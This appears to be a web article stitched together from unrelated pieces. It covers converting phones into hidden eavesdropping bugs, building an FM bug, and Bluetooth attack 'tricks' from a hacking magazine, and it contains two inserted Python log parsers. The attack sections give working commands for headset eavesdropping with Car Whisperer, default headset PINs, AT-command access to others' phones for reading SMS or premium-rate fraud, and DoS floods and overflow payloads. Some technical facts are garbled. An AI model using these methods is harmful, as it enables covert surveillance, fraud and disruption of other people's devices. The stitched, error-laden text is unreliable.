Useful Tips

How to make a bug with your own hands: diagram and detailed description


To listen in on a phone conversation it is not at all necessary to plant a bug in someone's pocket or to connect a listening device. The victim's own mobile phone is enough.

At the right moment your phone will dial a certain number on its own and unnoticed, and an interested attacker will be able to listen to your conversation until he hangs up.

And if the mobile phone is near you, you can be sure that the conversation will not only be heard but also recorded. The distance between you and the place of wiretapping does not matter.

Incidentally, no trace of the bogus call will appear in the phone's list of outgoing calls, so you will not be able to tell that you were eavesdropped on. Hard to believe? Alas, it is so. Not every cell phone, however, can be used by scammers as a wiretap.

There is a segment of consumers who prefer business-class smartphones. Such devices stand out for their wide capabilities and attractive design, but at the same time a smartphone of this kind has many vulnerabilities. Using them, an interested person can turn your smartphone into a wiretap under his control, and you will not even know about it.

And even if the attacker is on the other side of the globe, he will be quite capable of initiating a call to listen in on your cell phone. Nor is it necessary to steal the "victim's" phone in order to plant the "bug": some phone brands allow a call to be placed to them remotely without pressing any buttons on the device and even (!) without knowing the number.

Legal grounds

Of course, you need to understand that special listening equipment is the prerogative of the special services. Violating a person's constitutional rights, with proven guilt in infringing the privacy of private life, brings administrative punishment, and cases that end in criminal liability are frequent. So do not "abuse" the manufactured product. It is much wiser to use such a device as an additional means of security, or to exercise acoustic control over the territory of your own home. For example, a self-made bug for wiretapping will become an excellent "informant" if you are not sure of the decency of the nanny you hired or want to know what is happening in the classroom. Indeed, you never know when in life the use of listening devices will become a necessity.

Everyone knows that Bluetooth lets you transfer a file from device to device or connect a wireless headset. But its capabilities are not limited to that. With the right tool at hand you can work real miracles. So why not try yourself as a magician?

The built-in Bluetooth module (or, more formally, IEEE 802.15.3) has long ceased to be a curiosity. The module is so cheap that only a lazy manufacturer does not build it into a mobile, laptop or PDA, and even then only for marketing reasons. In a word, almost everyone uses Bluetooth. But only a few know that by using the technology they risk giving away their confidential data. But let's start with the good!

Mobile GSM bug: an incredibly simple solution

In order to make a listening device from a cell phone, you need a device that supports the "Auto Pick Up" function, as well as a headset (headphones). The Nokia 1280 can be considered the most suitable for such purposes, since the phone's simplicity and reliability let you count on the success of the project. Incidentally, the black-and-white screen is a sign of economy: the device's power consumption is significantly lower. Believe me, such a bug made from a phone with your own hands is an excellent substitute for expensive listening equipment. Moreover, the simple steps described below are within literally anyone's reach. Let's get started.

  • Go to the phone menu and enter the "Call mode" section.
  • Create your own personal mode. All items relating to the light indication, vibration, ringtone volume, screen saver, key-press sounds and incoming SMS notification need to be deactivated.
  • Give the new mode a name.
  • Through the main menu, find the "Accessories Setup" section, which usually has two sub-items, "headset" and "hearing aid". In each of them the operating parameters must be edited, and the question of how to make a bug will be practically resolved.
  • All "accessory" items must be enabled. Set the newly created mode active and exit the settings.
  • Cut the cord off the headphones and insert the plug into the headset jack.
  • The display should show the activated mode.

Trick 1: Using BT to remotely access a computer

Once, for a presentation, I invited a long-legged girlfriend along to press the space bar and advance the PowerPoint slides. That pleasure cost me an expensive lunch and two hours of empty talk with a Barbie girl. After that I firmly decided: next time I would get around the lack of a remote control differently. And I did, using my mobile phone! Yes, straight from the phone you can flip through slides, control music and do God knows what else. The only requirement is that both the phone and the computer have BT modules. Not only will you save money and effort, you will also look unforgivably fashionable. Anyone who uses the Bluetooth Remote Control utility, not long ago updated to version 3.0, can pull off this trick. It lets you control your computer from the screen of any mobile phone. Everything is very simple: a server component is installed on the computer, and a client program written in Java is installed on the phone (MIDP 2.0 is required). Once this simple scheme is set up, you can remotely control the computer's mouse and keyboard. Most importantly, you get access to the remote desktop: a real Remote Desktop right on your mobile phone screen! And time with a long-legged girlfriend can be spent far more successfully; Bluetooth Remote Control comes in handy here too, to put on romantic music :).

We use the smartphone for other purposes

When leaving on a business trip or vacation, you can leave behind a kind of watchman at home, so to speak, a mobile "guard". Nothing needs soldering: the cellular bug is simply a smartphone reworked with your own hands. Everything else is primitive.

  • Almost all smartphones are equipped with the "Auto-accept calls" function.
  • Relatively new handsets implement energy-saving technology. So, given a device in obviously healthy condition, you can count on 5-7 days of battery operation.
  • Another variant is to connect the phone to its charger, with a time-relay device acting as an intermediary between the outlet and the charger. An hour a day is a perfectly acceptable charging regime (given the situation described above).
  • Turn off the sound notification, light indication and vibration mode in the phone.
  • Plugging headphones into the headset jack will not be superfluous either, since the background sound around the caller would be an unwanted signal that could give away the location of the spy device.
  • Place the device in the middle of the living space. Remember: it should not be in a conspicuous place, but a wardrobe is not a solution either. Put the phone on a mezzanine or fix it to the back of a hanging picture.

Trick 2: Access Control with BT

If you work in a room with a dozen colleagues, you have probably had to lock your computer whenever you step out. And what happens? Before you have even walked away, someone is already rummaging through your hard drive. Not the most pleasant picture. In short, the computer needs locking; the question is how. You can use the standard Windows features and type a long password ten times a day. Or you can do it elegantly with Bluetooth. It is as simple as two and two: you walk away from the computer and it locks immediately; you come back and it unlocks as if nothing had happened. The only condition is that a Bluetooth module is present on both the computer and the mobile phone, and the LockItNow program is installed on the system (you could easily write such a program yourself; we once devoted a whole article to it). You can then tell friends and colleagues about your telepathic abilities, and later sell the secret for money :). By the way, if you do not have a BT dongle at hand, a phone that supports the "blue tooth" can stand in for it (connected via the COM port).

Bug for wiretapping: do it yourself from "improvised means"

As a rule, old phones are not thrown away. Find that long-forgotten "electronic comrade", because it is from it that you will make an effective sound pickup device. Almost any phone can be converted into a listening device. However, dimensions play an important role in "espionage life", so in such a delicate matter as wiretapping it is more advisable to use small phone models.

Trick 3: Pulling BT traffic out of the air

Mastery begins with understanding. Have you ever wanted to look inside the protocol and find out how data is exchanged over the "blue tooth"? Sniffing Bluetooth traffic can only be done "on yourself", that is, you intercept the outgoing and incoming traffic of the node on which you issued the command. Of no small importance here is the so-called Host Controller Interface (HCI), which provides access to the transmitter. The HCI node is usually connected to the Bluetooth device driver node (inbound stream) and to the L2CAP node (outbound stream). The Windows platform does not provide this capability by default. However, third-party developers have released special drivers that turn a standard dongle into a sniffer. The traditional showcase in this area is FTS4BT Wireless Bluetooth Protocol Analyzer, which costs crazy money. The product makes up for that by supporting the new Bluetooth v2.0+EDR, on which modern devices run, and, moreover, it can decode all traffic from the air on the fly, neatly sorting out audio, application-protocol data and much more. Clearly, for sniffing (and in general) the most relevant USB dongles are class 1, whose range reaches a hundred metres.

General flowchart

  • Disassemble the phone.
  • Remove the screen and all the LEDs (keyboard backlight: leave one for visual control).
  • Solder the power button.
  • Set up the device's "Auto answer" function, because the bug made with your own hands must pick up the call.
  • Replace the microphone with a more sensitive one (electret).
  • Lengthen the antenna (ordinary copper wire, 15-20 cm).
  • Solder the battery and fix it on top of the keyboard pad (with elastic or tape).
  • Check that it works.

The optocoupler shown in the diagram can be replaced by a KT315-type transistor or its Western analogues C9018 and C9014. In that case the capacitor is removed, and a resistor with a value of 2.2 kΩ is fitted.

Trick 4: working with the BT adapter directly

For a long time, Bluetooth stacks for Windows offered such meagre capabilities that programmers simply bypassed the platform. That explains why most programs for serious fun with the "blue tooth" are developed for *nix platforms. We will look at a few tricks on one such platform, namely FreeBSD (a reminder: the disk with the previous issue carried the latest 7.0 release of this OS). Bluetooth has been officially supported on it only since the 5.x branch, on top of the Netgraph subsystem. Happily, most USB adapters work with the ng_ubt driver (it must be loaded before the device is connected). Shall we try?

  1. Load the driver (before plugging in the adapter): kldload ng_ubt
  2. Copy the stack start-up script to a convenient place: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
  3. Start the stack on the adapter: sh /usr/local/etc/rc.bluetooth start ubt0

Now I want to introduce you to the hccontrol utility. This is one of the main programs for working with the BT module. It performs all the operations related to the HCI interface and has the following syntax: hccontrol -n <HCI node> <command>. Let's check that our device works by scanning the air for the presence of devices:

hccontrol -n ubt0hci Inquiry

As a result, the utility prints information about the devices it found, including their MAC addresses. Note that every Bluetooth device, whether a headset or an ordinary phone, represents a certain set of services. The basic list includes: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (Dial-Up Networking), FAX (Fax), FTRN (OBEX File Transfer), HSET (Headset), NAP (Network Access Point). To find out which services a particular device provides, a request is made over a special protocol, SDP (Service Discovery Protocol). The SDP server runs directly on the host machine and is purely an informational component (it cannot be influenced). You can determine which services the discovered devices provide with the corresponding utility:

# sdpcontrol -a <BD_ADDR> browse

Trick 5: Find hidden devices

So, we have scanned the air and even found out which services are available on active devices. But here is the catch! Some devices do not reveal their presence in any way, because they are in "Undiscoverable mode" and do not answer broadcast requests. You probably know this security option from your own phone's settings. Nevertheless, such devices can still be detected!

The best-known technique for detecting them is brute-force search of MAC addresses, that is, sending requests sequentially to different addresses in a certain range. For this you can use the very simple utility Redfang, which iterates over the last six bytes of the device address and thereby finds hidden devices.

Another option is a passive technique: put your device into standby mode while giving it an attractive name on the network:

hciconfig hci0 name BT_YANDEX
hciconfig hci0 down
hciconfig hci0 up
hcidump -V | grep bdaddr

As a result, all incoming connections will be shown, and comrades with hidden identifiers may well be among them.

Trick 6: Intercepting headset conversations from the air

One of the main threats of any radio technology is that data can be intercepted. The first thing that comes to mind with regard to Bluetooth is listening in on people using headsets. And often this is real! At the What the Hack hacker festival in the Netherlands, experts from the Trifinite group demonstrated how, using a laptop with Linux, a special program and a directional antenna, one can eavesdrop on what the driver of a passing car is saying through a Bluetooth headset. The group developed a program called Car Whisperer. Its capabilities are relatively modest: you can listen only to those who forgot to change the factory Bluetooth PIN, such as "0000" or "1234". But believe me, there are plenty of such poor fellows! The "Whisperer" is able to wedge itself in and successfully pass the "pairing" of devices, receiving the information transmitted from the car kit or headset to the mobile phone. Note that the utility not only lets you obtain the information passing between the headset and the phone but also lets you inject your own. We decided to test the program's capabilities by downloading Car Whisperer from the developers' site.

Before starting the operation, it is recommended to change the class of your device, especially if the program will be used from a computer:

hciconfig adapter class 0x500204
# 0x500204 is the class "phone"

Otherwise some "smart" devices may suspect something is wrong. The utility's syntax looks like this:

./carwhisperer <what we inject into the line> <what we capture from the line> <device address> [channel]

We took the file to inject straight from the utility's folder, and out.raw was specified as the output:

./carwhisperer 0 message.raw /tmp/out.raw 00:15:0E:91:19:73

The result is the file out.raw. It cannot be listened to in its raw form: it must be converted to an audio format, which requires an extra utility. Plenty of audio converters will do, for example SoX:

sox -r 8000 -c 1 -s -w out.raw -t wav -r 44100 -c 2 out.wav

Besides listening, you can log in, view the phone book and take advantage of the other "hands-free" features over Bluetooth. The principle is this: first, active devices are searched for and checked for the HS (Headset) service. Next, the device's MAC address is examined and an attempt is made to connect using a standard key. If the connection is established, you can do whatever you want with the device (within the available set of AT commands).

In practice it looks like this. First, all active headsets are searched for with the command "sdptool search HS", which prints something like this:

Searching for HS on 00:0A:3A:54:71:95 ...
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
"Headset" (0x1108)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Next, an attempt is made to open an RFCOMM connection on the SCO audio channel with the command "rfcomm connect 2 00:0A:3A:54:71:95 1" and to send the required AT commands. Here is a short statistical note on the authorization data for some models of wireless headsets:

Nokia (00:02:EE:…) - pin="5475"
Audi UHV (00:0E:9F:…) - pin="1234"
O'Neill (00:80:37:…) - pin="8761"
Cellink (00:0A:94:…) - pin="1234"
Eazix (00:0C:84:…) - pin="1234"

Incidentally, the same principle can be used for unauthorized connection to all other devices as well. Using AT commands and the RFCOMM protocol one can, for example, read an SMS message or even send one from someone else's phone to a premium-rate number, costing the device's owner money. Be vigilant!
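The sdptool output quoted above is easy to inventory automatically, which is useful when checking which of your own devices advertise the Headset profile and on which RFCOMM channel. The following Python parser is an added example, not code from the article; its sample input is constructed from the record shown above plus a second, constructed address that returned no record.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

HEADSET_UUID = 0x1108  # "Headset" service class, as in the quoted output

# Constructed sample: the record quoted above, plus a second address with no record.
SAMPLE = """\
Searching for HS on 00:0A:3A:54:71:95 ...
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
  "Headset" (0x1108)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0100

Searching for HS on 00:11:22:33:44:55 ...
"""

SEARCH_RE = re.compile(r"^Searching for \w+ on ([0-9A-Fa-f:]{17})")
UUID_RE = re.compile(r'^"([^"]+)" \((0x[0-9A-Fa-f]+)\)$')
KV_RE = re.compile(r"^([\w ]+): (.+)$")

@dataclass
class SdpRecord:
    bdaddr: str
    name: str = ""
    class_ids: List[int] = field(default_factory=list)
    rfcomm_channel: Optional[int] = None
    profiles: Dict[int, int] = field(default_factory=dict)  # uuid -> version

def parse_sdptool(text: str) -> Tuple[List[str], List[SdpRecord]]:
    """Return (addresses scanned, service records found); indentation is ignored."""
    scanned, records = [], []
    addr, rec, section, last_uuid = "?", None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := SEARCH_RE.match(line):
            addr, rec = m.group(1), None
            scanned.append(addr)
        elif line.startswith("Service Name: "):
            rec = SdpRecord(bdaddr=addr, name=line[len("Service Name: "):])
            records.append(rec)
            section = last_uuid = None
        elif line.endswith("List:"):
            section = line[:-1]  # remember which attribute list we are inside
        elif rec is None:
            continue  # attributes before any record header are ignored
        elif m := UUID_RE.match(line):
            last_uuid = int(m.group(2), 16)
            if section == "Service Class ID List":
                rec.class_ids.append(last_uuid)
        elif m := KV_RE.match(line):
            key, val = m.group(1), m.group(2).strip()
            if key == "Channel" and last_uuid == 0x0003:  # entry under "RFCOMM"
                rec.rfcomm_channel = int(val)
            elif key == "Version" and section == "Profile Descriptor List":
                rec.profiles[last_uuid] = int(val, 16)
    return scanned, records

def headset_endpoints(records: List[SdpRecord]) -> Dict[str, Optional[int]]:
    """Devices advertising the Headset class -> the RFCOMM channel they expose."""
    return {r.bdaddr: r.rfcomm_channel for r in records if HEADSET_UUID in r.class_ids}
```

Run `headset_endpoints(parse_sdptool(SAMPLE)[1])` to get the address-to-channel map; feeding it real `sdptool search HS` output works the same way.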

Trick 7: DDoS BT devices

The approach is traditional. A DDoS is really possible when the host device (the "master") is made to do many times more work than the client. Such a situation is called a Denial of Service attack. It can hang the phone or drain the battery quickly. There are several ways to carry out the attack. Let's start with standard tools. The most obvious is to ping the device with large packets, which is done by giving l2ping the "-s" parameter:

# l2ping -s 10000 -b "MAC address"

The program itself, as you have guessed, is a relative of ping in the Bluetooth world and serves to check the connection and whether one exists at all. Another method, fundamentally different from the first, is the "fuzzing" technique, a kind of lottery, because it is not known in advance what will happen. This is a new trend in finding vulnerabilities in products without analysing source code. The technique relies solely on interactive communication with the target in a language it understands, but with completely chaotic arguments and variable values. The hacker's task is to make the phone's visible name consist of a sufficiently large number of elements. When the "master" discovers it, in 70% of cases this results in an overflow or a denial of service:

hciconfig hci0 name `perl -e 'print "ash" x 3137'`
# command for Linux
hccontrol -n <adapter> change_local_name "new name"
# example for FreeBSD

Many phones still cannot digest bomb files. Here is a simple implementation of the technique.

  1. First prepare the "bomb". A well-known example:
    echo `perl -e 'print "skvz" x 3137'` > file
  2. Then a modified utility for working with OBEX, USSP PUSH, is used:
    ./obextool push file 00:0A:3A:54:71:95 `perl -e 'print "skvz" x 3137'` 3
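Seen from the defender's side, both patterns above leave recognisable traces in an HCI trace. The following detector is an added example, not from the article: it scans hcidump-style lines for floods of oversized L2CAP echo requests (what l2ping -s produces) and for abnormally long remote names. The log excerpt is constructed and the three thresholds are assumptions.

```python
import re
from collections import Counter

NAME_LIMIT = 100        # assumed: names approaching the 248-byte spec maximum are suspect
ECHO_DLEN_LIMIT = 1000  # assumed: genuine L2CAP echo payloads are a few dozen bytes
ECHO_COUNT_LIMIT = 3    # assumed: more oversized echoes than this from one peer is a flood

# Constructed hcidump-style excerpt: one normal l2ping, four 10000-byte
# echo requests (l2ping -s 10000), one normal name and one 240-byte name.
SAMPLE_LOG = """\
> HCI Event: Connect Complete (0x03) plen 11
    status 0x00 handle 11 bdaddr 00:0A:3A:54:71:95 type ACL encrypt 0x00
> ACL data: handle 11 flags 0x02 dlen 48
    L2CAP(s): Echo req: dlen 44
""" + """\
> ACL data: handle 11 flags 0x02 dlen 10004
    L2CAP(s): Echo req: dlen 10000
""" * 4 + """\
> HCI Event: Remote Name Req Complete (0x07) plen 255
    status 0x00 bdaddr 00:11:22:33:44:55 name 'Nokia 6230'
> HCI Event: Remote Name Req Complete (0x07) plen 255
    status 0x00 bdaddr 00:1C:2B:33:44:55 name '""" + "ash" * 80 + "'\n"

CONNECT_RE = re.compile(r"status 0x00 handle (\d+) bdaddr ([0-9A-F:]{17}) type ACL")
ACL_RE = re.compile(r"^> ACL data: handle (\d+) flags 0x[0-9a-f]+ dlen (\d+)")
ECHO_RE = re.compile(r"L2CAP\(s\): Echo req: dlen (\d+)")
NAME_RE = re.compile(r"bdaddr ([0-9A-F:]{17}) name '(.*)'$")

def analyse(lines):
    """Return {'echo_flood': {bdaddr: count}, 'long_name': {bdaddr: byte_length}}."""
    handle_to_addr = {}    # ACL handle -> peer address, learned from Connect Complete
    current_handle = None  # handle of the ACL packet whose L2CAP payload follows
    oversized = Counter()
    long_names = {}
    for raw in lines:
        line = raw.strip()
        if m := CONNECT_RE.search(line):
            handle_to_addr[m.group(1)] = m.group(2)
        elif m := ACL_RE.match(line):
            current_handle = m.group(1)
        elif (m := ECHO_RE.search(line)) and current_handle is not None:
            if int(m.group(1)) > ECHO_DLEN_LIMIT:
                peer = handle_to_addr.get(current_handle, "handle " + current_handle)
                oversized[peer] += 1
        elif m := NAME_RE.search(line):
            size = len(m.group(2).encode("utf-8"))
            if size > NAME_LIMIT:
                long_names[m.group(1)] = size
    return {
        "echo_flood": {a: n for a, n in oversized.items() if n > ECHO_COUNT_LIMIT},
        "long_name": long_names,
    }

def main():
    for kind, hits in analyse(SAMPLE_LOG.splitlines()).items():
        for addr, value in hits.items():
            print(f"{kind}: {addr} ({value})")

if __name__ == "__main__":
    main()
```

On a live system the same function can be fed the output of `hcidump -V` line by line.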

Read the full article in the April issue of Hacker! On our disk you will find the full versions of the programs described in the article, as well as a complete selection of Bluetooth documentation and vulnerabilities in this technology.

Is it possible to defend against attack by intruders?

Can a cell-phone conversation be listened to? Alas, there is no reliable protection. At the same time, it should be noted that not all phones are affected by this vulnerability: on some models the headset must be authenticated.

One option is to apply a patch that closes this "hole" in the phone's firmware.

And during an important confidential conversation the phone should be switched off. Better still, use wiretap jammers.

Technical Support Team Leader: Zakharov Vladimir

Miniature bug

You can make an FM transmitter with your own hands. A fairly simple circuit will let you receive the signal in the 88-92 MHz radio band. Do not rush to the shop for parts: you may have faulty electrical equipment whose board the necessary components can be salvaged from.

  • Bipolar transistor - 2N3904 or an analogue.
  • Resistors - 4.7 and 330 kOhm.
  • Capacitors - 4.7 pF, 1 and 22 nF.
  • 30 pF trimmer capacitor.
  • Tank coil - 6 mm winding diameter, eight turns, 0.5 mm wire.
  • Board material - copper-clad fibreglass.
  • Battery type "Krona" at 9 watts.
  • Electret microphone (the most sensitive ones are used in tape recorders).

Assembling the FM bug for wiretapping

  • First, the trimmer capacitor is soldered in (the middle of the board). The transistor is mounted on the left.
  • Moving to the bottom, we install (from left to right) the capacitors: the first 4.7 pF, the second 1 nF.
  • Now solder in the resistors.
  • Then the 22 nF capacitor and the air-core coil.
  • The antenna wire, the microphone and the battery leads complete the assembly.

In conclusion

Now it is no secret to you how to make a bug out of your phone and what is needed for it. The GSM and radio options presented in this overview are only a part of the many available electronic designs through which high-quality acoustic control can be established. It should be noted, however, that practicality and quality are achieved by following the recommendations above. Perhaps there is a "craftsman" who will come up with a more rational way to get excellent performance out of his listening inventions. In the meantime, we will use what we have. Listen carefully!